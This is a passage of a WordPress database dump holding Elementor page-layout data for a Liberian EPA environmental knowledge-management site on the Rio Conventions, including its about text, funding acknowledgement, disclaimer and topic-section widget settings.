the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12398,2020,'_wp_page_template','default'),(12399,2020,'_elementor_edit_mode','builder'),(12400,2020,'_elementor_template_type','wp-page'),(12401,2020,'_elementor_version','2.7.5'),(12402,2020,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"400\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"400\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(12405,2021,'_wp_page_template','default'),(12406,2021,'_elementor_edit_mode','builder'),(12407,2021,'_elementor_template_type','wp-page'),(12408,2021,'_elementor_version','2.7.5'),(12409,2021,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cbea0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"41031e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84fff34\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Framework Convention on Climate Change\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79aac65\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a52e74\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5595d5e\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"479,480,481,482,483,484,485,486,487,488,489\",\"title_trimmed\":\"\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae05976\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2d42ab0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e058d8c\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention to Combat Desertification\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3e3f0b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8c7ba54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e8c7b65\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"474,476,477,478\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"rgba(0,100,0,0.57)\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(12411,2022,'_wp_page_template','default'),(12412,2022,'_elementor_edit_mode','builder'),(12413,2022,'_elementor_template_type','wp-page'),(12414,2022,'_elementor_version','2.7.5'),(12415,2022,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"The United Nations Convention on Biological Diversity\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"120368b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"67b8367\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f988187\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"posts_query\":\"ids\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"rows_gap\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 